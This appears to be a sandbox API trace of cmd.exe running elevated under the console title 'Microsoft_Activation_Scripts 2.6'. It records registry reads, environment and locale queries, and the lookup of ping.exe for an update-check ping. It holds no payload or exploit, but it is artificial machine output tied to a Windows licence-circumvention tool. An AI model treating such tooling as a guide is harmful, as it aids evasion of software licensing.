__alignment2=0xffff8000)) returned 0x30 [0178.552] GetConsoleOutputCP () returned 0x1b5 [0178.553] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0178.553] SetConsoleCtrlHandler (HandlerRoutine=0x7ff7bd712ad0, Add=1) returned 1 [0178.553] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.553] SetConsoleMode (hConsoleHandle=0x98, dwMode=0x0) returned 0 [0178.553] _get_osfhandle (_FileHandle=1) returned 0x98 [0178.553] GetConsoleMode (in: hConsoleHandle=0x98, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0178.553] _get_osfhandle (_FileHandle=0) returned 0x20 [0178.553] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0178.554] GetEnvironmentStringsW () returned 0x2763aa35b70* [0178.554] GetProcessHeap () returned 0x2763aa30000 [0178.554] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0xfbe) returned 0x2763aa36b40 [0178.554] memcpy (in: _Dst=0x2763aa36b40, _Src=0x2763aa35b70, _Size=0xfbe | out: _Dst=0x2763aa36b40) returned 0x2763aa36b40 [0178.554] FreeEnvironmentStringsA (penv="=") returned 1 [0178.554] GetProcessHeap () returned 0x2763aa30000 [0178.554] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x8) returned 0x2763aa325c0 [0178.554] GetEnvironmentStringsW () returned 0x2763aa35b70* [0178.554] GetProcessHeap () returned 0x2763aa30000 [0178.554] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0xfbe) returned 0x2763aa37b10 [0178.555] memcpy (in: _Dst=0x2763aa37b10, _Src=0x2763aa35b70, _Size=0xfbe | out: _Dst=0x2763aa37b10) returned 0x2763aa37b10 [0178.555] FreeEnvironmentStringsA (penv="=") returned 1 [0178.555] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa68998e608 | out: phkResult=0xa68998e608*=0x78) returned 0x0 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x0, lpData=0xa68998e620*=0x50, lpcbData=0xa68998e604*=0x1000) returned 0x2 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x4, lpData=0xa68998e620*=0x1, lpcbData=0xa68998e604*=0x4) returned 0x0 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x0, lpData=0xa68998e620*=0x1, lpcbData=0xa68998e604*=0x1000) returned 0x2 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x4, lpData=0xa68998e620*=0x0, lpcbData=0xa68998e604*=0x4) returned 0x0 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x4, lpData=0xa68998e620*=0x40, lpcbData=0xa68998e604*=0x4) returned 0x0 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x4, lpData=0xa68998e620*=0x40, lpcbData=0xa68998e604*=0x4) returned 0x0 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x0, lpData=0xa68998e620*=0x40, lpcbData=0xa68998e604*=0x1000) returned 0x2 [0178.555] RegCloseKey (hKey=0x78) returned 0x0 [0178.555] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa68998e608 | out: phkResult=0xa68998e608*=0x78) returned 0x0 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x0, lpData=0xa68998e620*=0x40, lpcbData=0xa68998e604*=0x1000) returned 0x2 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x4, lpData=0xa68998e620*=0x1, lpcbData=0xa68998e604*=0x4) returned 0x0 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x0, lpData=0xa68998e620*=0x1, lpcbData=0xa68998e604*=0x1000) returned 0x2 [0178.555] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x4, lpData=0xa68998e620*=0x0, lpcbData=0xa68998e604*=0x4) returned 0x0 [0178.556] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x4, lpData=0xa68998e620*=0x9, lpcbData=0xa68998e604*=0x4) returned 0x0 [0178.556] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x4, lpData=0xa68998e620*=0x9, lpcbData=0xa68998e604*=0x4) returned 0x0 [0178.556] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa68998e600, lpData=0xa68998e620, lpcbData=0xa68998e604*=0x1000 | out: lpType=0xa68998e600*=0x0, lpData=0xa68998e620*=0x9, lpcbData=0xa68998e604*=0x1000) returned 0x2 [0178.556] RegCloseKey (hKey=0x78) returned 0x0 [0178.556] time (in: timer=0x0 | out: timer=0x0) returned 0x662cc6e9 [0178.556] srand (_Seed=0x662cc6e9) [0178.556] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c ping -4 -n 1 updatecheck.massgrave.dev" [0178.556] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c ping -4 -n 1 updatecheck.massgrave.dev" [0178.556] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0178.556] GetProcessHeap () returned 0x2763aa30000 [0178.556] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x218) returned 0x2763aa38b10 [0178.556] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2763aa38b20, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0178.556] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0178.556] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0178.556] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x4 [0178.556] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0178.557] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.557] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0178.557] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0178.557] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0178.557] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0178.557] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0178.557] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0178.557] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0178.557] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0178.557] GetProcessHeap () returned 0x2763aa30000 [0178.557] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x38) returned 0x2763aa38d30 [0178.557] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa68998f410 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0178.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32", nBufferLength=0x104, lpBuffer=0xa68998f410, lpFilePart=0xa68998f3f0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0xa68998f3f0*="System32") returned 0x13 [0178.557] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0178.558] FindFirstFileW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), lpFindFileData=0xa68998f120 | out: lpFindFileData=0xa68998f120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x2763aa30720 [0178.558] FindClose (in: hFindFile=0x2763aa30720 | out: hFindFile=0x2763aa30720) returned 1 [0178.558] memcpy (in: _Dst=0xa68998f416, _Src=0xa68998f14c, _Size=0xe | out: _Dst=0xa68998f416) returned 0xa68998f416 [0178.558] FindFirstFileW (in: lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32"), lpFindFileData=0xa68998f120 | out: lpFindFileData=0xa68998f120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x2763aa30720 [0178.559] FindClose (in: hFindFile=0x2763aa30720 | out: hFindFile=0x2763aa30720) returned 1 [0178.559] memcpy (in: _Dst=0xa68998f426, _Src=0xa68998f14c, _Size=0x10 | out: _Dst=0xa68998f426) returned 0xa68998f426 [0178.559] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0178.559] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0178.559] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0178.559] GetProcessHeap () returned 0x2763aa30000 [0178.560] RtlFreeHeap (HeapHandle=0x2763aa30000, Flags=0x0, BaseAddress=0x2763aa36b40) returned 1 [0178.560] GetEnvironmentStringsW () returned 0x2763aa36780* [0178.560] GetProcessHeap () returned 0x2763aa30000 [0178.560] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0xfbe) returned 0x2763aa3b230 [0178.560] memcpy (in: _Dst=0x2763aa3b230, _Src=0x2763aa36780, _Size=0xfbe | out: _Dst=0x2763aa3b230) returned 0x2763aa3b230 [0178.560] FreeEnvironmentStringsA (penv="=") returned 1 [0178.560] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff7bd731940 | out: lpBuffer="C:\\Windows\\System32") returned 0x13 [0178.560] GetProcessHeap () returned 0x2763aa30000 [0178.561] RtlFreeHeap (HeapHandle=0x2763aa30000, Flags=0x0, BaseAddress=0x2763aa38d30) returned 1 [0178.561] GetProcessHeap () returned 0x2763aa30000 [0178.561] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x4016) returned 0x2763aa3c200 [0178.561] GetProcessHeap () returned 0x2763aa30000 [0178.561] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x62) returned 0x2763aa30720 [0178.562] GetProcessHeap () returned 0x2763aa30000 [0178.562] RtlFreeHeap (HeapHandle=0x2763aa30000, Flags=0x0, BaseAddress=0x2763aa3c200) returned 1 [0178.562] GetConsoleOutputCP () returned 0x1b5 [0178.563] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0178.563] GetUserDefaultLCID () returned 0x409 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff7bd72d6a0, cchData=8 | out: lpLCData=":") returned 2 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xa68998f540, cchData=128 | out: lpLCData="0") returned 2 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xa68998f540, cchData=128 | out: lpLCData="0") returned 2 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xa68998f540, cchData=128 | out: lpLCData="1") returned 2 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff7bd72d6b0, cchData=8 | out: lpLCData="/") returned 2 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff7bd72d700, cchData=32 | out: lpLCData="Mon") returned 4 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff7bd72d740, cchData=32 | out: lpLCData="Tue") returned 4 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff7bd72d780, cchData=32 | out: lpLCData="Wed") returned 4 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff7bd72d7c0, cchData=32 | out: lpLCData="Thu") returned 4 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff7bd72d800, cchData=32 | out: lpLCData="Fri") returned 4 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff7bd72d840, cchData=32 | out: lpLCData="Sat") returned 4 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff7bd72d880, cchData=32 | out: lpLCData="Sun") returned 4 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff7bd72d6c0, cchData=8 | out: lpLCData=".") returned 2 [0178.564] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff7bd72d6e0, cchData=8 | out: lpLCData=",") returned 2 [0178.564] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0178.566] GetProcessHeap () returned 0x2763aa30000 [0178.566] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x0, Size=0x20c) returned 0x2763aa36780 [0178.566] GetConsoleTitleW (in: lpConsoleTitle=0x2763aa36780, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0178.568] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffbed570000 [0178.568] GetProcAddress (hModule=0x7ffbed570000, lpProcName="CopyFileExW") returned 0x7ffbed598940 [0178.568] GetProcAddress (hModule=0x7ffbed570000, lpProcName="IsDebuggerPresent") returned 0x7ffbed597460 [0178.568] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffbea416e50 [0178.568] GetProcessHeap () returned 0x2763aa30000 [0178.568] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x4012) returned 0x2763aa3c200 [0178.568] GetProcessHeap () returned 0x2763aa30000 [0178.569] RtlFreeHeap (HeapHandle=0x2763aa30000, Flags=0x0, BaseAddress=0x2763aa3c200) returned 1 [0178.569] _wcsicmp (_String1="ping", _String2=")") returned 71 [0178.570] _wcsicmp (_String1="FOR", _String2="ping") returned -10 [0178.570] _wcsicmp (_String1="FOR/?", _String2="ping") returned -10 [0178.570] _wcsicmp (_String1="IF", _String2="ping") returned -7 [0178.570] _wcsicmp (_String1="IF/?", _String2="ping") returned -7 [0178.570] _wcsicmp (_String1="REM", _String2="ping") returned 2 [0178.570] _wcsicmp (_String1="REM/?", _String2="ping") returned 2 [0178.570] GetProcessHeap () returned 0x2763aa30000 [0178.570] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0xb0) returned 0x2763aa369a0 [0178.570] GetProcessHeap () returned 0x2763aa30000 [0178.570] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x1a) returned 0x2763aa30800 [0178.571] GetProcessHeap () returned 0x2763aa30000 [0178.571] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x56) returned 0x2763aa36a60 [0178.572] GetConsoleTitleW (in: lpConsoleTitle=0xa68998f430, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0178.573] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0178.573] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0178.573] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0178.573] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0178.574] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0178.574] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0178.574] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0178.574] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0178.574] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0178.574] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0178.574] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0178.574] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0178.574] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0178.574] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0178.574] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0178.574] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0178.574] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0178.574] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0178.574] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0178.574] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0178.574] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0178.574] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0178.574] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0178.574] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0178.574] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0178.574] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0178.574] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0178.574] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0178.575] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0178.575] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0178.575] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0178.575] _wcsicmp (_String1="ping", _String2="START") returned -3 [0178.575] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0178.575] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0178.575] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0178.575] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0178.575] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0178.575] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0178.575] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0178.575] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0178.575] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0178.575] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0178.575] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0178.575] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0178.575] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0178.575] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0178.575] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0178.575] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0178.575] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0178.575] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0178.576] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0178.576] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0178.576] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0178.576] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0178.576] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0178.576] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0178.576] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0178.576] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0178.576] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0178.576] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0178.576] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0178.576] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0178.576] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0178.576] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0178.576] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0178.576] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0178.576] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0178.576] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0178.576] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0178.576] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0178.576] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0178.576] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0178.576] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0178.576] _wcsicmp (_String1="ping", _String2="START") returned -3 [0178.576] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0178.577] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0178.577] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0178.577] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0178.577] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0178.577] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0178.577] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0178.577] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0178.577] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0178.577] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0178.577] _wcsicmp (_String1="ping", _String2="FOR") returned 10 [0178.577] _wcsicmp (_String1="ping", _String2="IF") returned 7 [0178.577] _wcsicmp (_String1="ping", _String2="REM") returned -2 [0178.577] GetProcessHeap () returned 0x2763aa30000 [0178.577] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x218) returned 0x2763aa36ac0 [0178.577] GetProcessHeap () returned 0x2763aa30000 [0178.577] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x60) returned 0x2763aa36ce0 [0178.577] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0178.578] GetProcessHeap () returned 0x2763aa30000 [0178.578] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x420) returned 0x2763aa36d50 [0178.578] SetErrorMode (uMode=0x0) returned 0x0 [0178.578] SetErrorMode (uMode=0x1) returned 0x0 [0178.578] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2763aa36d60, lpFilePart=0xa68998ecd0 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0xa68998ecd0*="System32") returned 0x13 [0178.578] SetErrorMode (uMode=0x0) returned 0x1 [0178.578] GetProcessHeap () returned 0x2763aa30000 [0178.578] RtlReAllocateHeap (Heap=0x2763aa30000, Flags=0x0, Ptr=0x2763aa36d50, Size=0x42) returned 0x2763aa36d50 [0178.578] GetProcessHeap () returned 0x2763aa30000 [0178.578] RtlSizeHeap (HeapHandle=0x2763aa30000, Flags=0x0, MemoryPointer=0x2763aa36d50) returned 0x42 [0178.579] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0178.579] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.579] GetProcessHeap () returned 0x2763aa30000 [0178.579] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0xee) returned 0x2763aa36db0 [0178.579] GetProcessHeap () returned 0x2763aa30000 [0178.579] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0x1cc) returned 0x2763aa36eb0 [0178.587] GetProcessHeap () returned 0x2763aa30000 [0178.587] RtlReAllocateHeap (Heap=0x2763aa30000, Flags=0x0, Ptr=0x2763aa36eb0, Size=0xf0) returned 0x2763aa36eb0 [0178.587] GetProcessHeap () returned 0x2763aa30000 [0178.587] RtlSizeHeap (HeapHandle=0x2763aa30000, Flags=0x0, MemoryPointer=0x2763aa36eb0) returned 0xf0 [0178.587] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0178.587] GetProcessHeap () returned 0x2763aa30000 [0178.587] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x8, Size=0xfc) returned 0x2763aa36fb0 [0178.589] GetProcessHeap () returned 0x2763aa30000 [0178.589] RtlReAllocateHeap (Heap=0x2763aa30000, Flags=0x0, Ptr=0x2763aa36fb0, Size=0x88) returned 0x2763aa36fb0 [0178.589] GetProcessHeap () returned 0x2763aa30000 [0178.589] RtlSizeHeap (HeapHandle=0x2763aa30000, Flags=0x0, MemoryPointer=0x2763aa36fb0) returned 0x88 [0178.590] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0178.590] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\ping.*" (normalized: "c:\\windows\\system32\\ping.*"), fInfoLevelId=0x1, lpFindFileData=0xa68998ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa68998ea50) returned 0x2763aa37050 [0178.590] GetProcessHeap () returned 0x2763aa30000 [0178.590] RtlAllocateHeap (HeapHandle=0x2763aa30000, Flags=0x0, Size=0x28) returned 0x2763aa38d30 [0178.590] FindClose (in: hFindFile=0x2763aa37050 | out: hFindFile=0x2763aa37050) returned 1 [0178.591] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\PING.COM" (normalized: "c:\\windows\\system32\\ping.com"), fInfoLevelId=0x1, lpFindFileData=0xa68998ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa68998ea50) returned 0xffffffffffffffff [0178.591] GetLastError () returned 0x2 [0178.591] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe"), fInfoLevelId=0x1, lpFindFileData=0xa68998ea50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa68998ea50) returned 0x2763aa37050 [0178.591] GetProcessHeap () returned 0x2763aa30000 [0178.591] RtlReAllocateHeap (Heap=0x2763aa30000, Flags=0x0, Ptr=0x2763aa38d30, Size=0x8) returned 0x2763aa38d30 [0178.591] FindClose (in: hFindFile=0x2763aa37050 | out: hFindFile=0x2763aa37050) returned 1 [0178.591] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0178.591] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.592] GetConsoleTitleW (in: lpConsoleTitle=0xa68998efb0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0178.592] InitializeProcThreadAttributeList (in: lpAttributeList=0xa68998eed0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa68998edd0 | out: lpAttributeList=0xa68998eed0, lpSize=0xa68998edd0) returned 1 